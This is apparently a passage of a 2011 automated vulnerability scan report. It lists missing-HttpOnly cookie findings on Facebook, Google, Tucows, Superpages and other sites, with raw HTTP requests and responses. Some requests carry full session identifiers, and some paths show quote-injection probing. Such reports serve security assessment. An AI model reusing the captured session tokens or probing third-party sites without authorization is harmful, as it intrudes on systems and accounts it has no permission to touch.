<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
lsd=bxxex; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /supermediacom HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: datr=yP9KTbiv931zl65aXpcqa4m-; expires=Sat, 02-Feb-2013 19:19:36 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: lsd=bxxex; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Thu, 03 Feb 2011 19:19:37 GMT Content-Length: 146681
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /search/ HTTP/1.1 Host: www.flickr.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:49:30 GMT P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" Set-Cookie: BX=4kc870h6km8na&b=3&s=0v; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com Set-Cookie: localization=en-us%3Bus%3Bus; expires=Sun, 02-Feb-2014 21:49:30 GMT; path=/; domain=.flickr.com Set-Cookie: cookie_l10n=deleted; expires=Wed, 03-Feb-2010 21:49:29 GMT; path=/; domain=flickr.com Set-Cookie: cookie_intl=deleted; expires=Wed, 03-Feb-2010 21:49:29 GMT; path=/; domain=flickr.com Set-Cookie: search_z=t; expires=Wed, 30-Oct-2013 21:49:30 GMT; path=/; domain=.flickr.com X-Served-By: www87.flickr.mud.yahoo.com Cache-Control: private Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23029
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The following cookie was issued by the application and does not have the HttpOnly flag set:
GALX=p2zNnJZpTnA;Path=/accounts;Secure
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /accounts/Login HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
The following cookie was issued by the application and does not have the HttpOnly flag set:
GALX=hB-ORbAny80;Path=/accounts;Secure
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /accounts/ServiceLogin HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.inceptor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:20:10 GMT Server: Unspecified Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:35:12 GMT;path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" cont ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /online-casino/ HTTP/1.1 Host: www.jackpotcity.com Proxy-Connection: keep-alive Referer: http://www.thumbshots.com/Support.aspx Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /find-jobs/All-Location/warehouse-openings-in-westland-michigan.html/x22 HTTP/1.1 Host: www.jobsyndicates.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:59:12 GMT Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.3.3 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 4385d0f17cf8fcee3ef445880de44c08=829c034d40083b97a500eea83e80612d; path=/ Set-Cookie: ja_kyanite_ii_tpl=ja_kyanite_ii; expires=Tue, 24-Jan-2012 21:59:12 GMT; path=/ Last-Modified: Thu, 03 Feb 2011 21:59:12 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 24855
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /wholesale-Shower-Faucets_c2863 HTTP/1.1 Host: www.lightinthebox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /in/troyd/x22 HTTP/1.1 Host: www.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Server: Apache-Coyote/1.1 Set-Cookie: bcookie="v=1&0cafcf8d-e068-4822-b520-7439b567b823"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Tue, 21-Feb-2079 23:39:36 GMT; Path=/ Last-Modified: Thu, 27 Jan 2011 18:58:16 GMT If-Modified-Since: Thu, 27 Jan 2011 18:58:16 GMT Set-Cookie: lang="v=2&lang=en"; Version=1; Domain=linkedin.com; Path=/ Content-Type: text/html;charset=UTF-8 Content-Language: en-US Date: Thu, 03 Feb 2011 20:25:29 GMT X-Cache: MISS from www.linkedin.com X-Cache-Lookup: MISS from www.linkedin.com:8080 Via: 1.0 www.linkedin.com (squid/3.0.STABLE20) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> < ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.localsearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><title> The Local Sear ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.milanoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /buzz/members/smartdesis/x22 HTTP/1.1 Host: www.mybloglog.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:28:24 GMT Set-Cookie: BX=9fhlkdh6km3v8&b=3&s=1o; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.mybloglog.com P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV" Cache-Control: private Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 7249
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title>Page Not Found - MyBlogLog</title> <meta http-equiv="Cont ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.omniture.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Server: Omniture AWS/2.0.0 Location: http://www.omniture.com/en/ Content-Length: 313 Content-Type: text/html; charset=iso-8859-1 Vary: Accept-Encoding Date: Thu, 03 Feb 2011 19:21:03 GMT Connection: close Set-Cookie: BIGipServerhttp_omniture=101320202.5892.0000; path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://www.omniture.com ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /specials/sd/buy-sd.htm HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /specials/smartdraw.asp HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /submit HTTP/1.1 Host: www.stumbleupon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=7E88C67F7FFF85DD8CFB8379B82BF1F4; __unam=c5114f2-12dec4b1cc4-7f15d273-3; SPC=1296748823650-www.superpages.com-30323935-794472; s_sq=%5B%5BB%5D%5D; s_ppv=100; web=; s_cc=true; s_lastvisit=1296754109045; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; yp=; shopping=; s.campaign=comlocal1a;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:35:12 GMT Server: Unspecified Vary: Host Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:50:12 GMT;path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /inc/social/sln.php HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=7E88C67F7FFF85DD8CFB8379B82BF1F4; __unam=c5114f2-12dec4b1cc4-7f15d273-3; SPC=1296748823650-www.superpages.com-30323935-794472; s_sq=%5B%5BB%5D%5D; s_ppv=100; web=; s_cc=true; s_lastvisit=1296754109045; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; yp=; shopping=; s.campaign=comlocal1a;
Response
HTTP/1.0 302 Found Date: Thu, 03 Feb 2011 19:35:15 GMT Server: Unspecified Vary: Host Location: Content-Length: 0 Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:50:15 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:09:25 GMT Server: Unspecified Vary: Host Connection: close Content-Type: application/javascript Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff9482136245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:24:24 GMT;path=/
var IE = document.all?true:false if (!IE) document.captureEvents(Event.MOUSEMOVE) document.onmousemove = getMouseXY; var tempX = 0 var tempY = 0 function getMouseXY(e) { if (IE) { // grab the x-y po ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /inc/social/soc_email.php/ HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=7E88C67F7FFF85DD8CFB8379B82BF1F4; __unam=c5114f2-12dec4b1cc4-7f15d273-3; SPC=1296748823650-www.superpages.com-30323935-794472; s_sq=%5B%5BB%5D%5D; s_ppv=100; web=; s_cc=true; s_lastvisit=1296754109045; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; yp=; shopping=; s.campaign=comlocal1a;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:35:14 GMT Server: Unspecified Vary: Host Content-Length: 0 Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:50:14 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /superguarantee/ HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=7E88C67F7FFF85DD8CFB8379B82BF1F4; __unam=c5114f2-12dec4b1cc4-7f15d273-3; SPC=1296748823650-www.superpages.com-30323935-794472; s_sq=%5B%5BB%5D%5D; s_ppv=100; web=; s_cc=true; s_lastvisit=1296754109045; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; yp=; shopping=; s.campaign=comlocal1a;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:35:25 GMT Server: Unspecified Vary: Host Connection: close Content-Type: text/html Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:50:25 GMT;path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="h ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.supertradeexchange.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 13237 Content-Type: text/html Server: Microsoft-IIS/7.0 Set-Cookie: itex%5Fpersist=anon=Y; expires=Fri, 03-Feb-2012 08:00:00 GMT; domain=www.supertradeexchange.com; path=/ Date: Thu, 03 Feb 2011 19:35:26 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>SuperTradeExchange® - a small business community and barter netwo ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:26:53 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 84746
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Free Software and Sh ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /about.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:27:05 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 31489
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tucows Download</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /advertise.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:27:10 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 31096
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tucows Download</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /affiliate/index.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:27:11 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 33526
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tucows Download</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /author_ratings.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:27:07 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 34091
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Tucows Download</tit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /contact.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
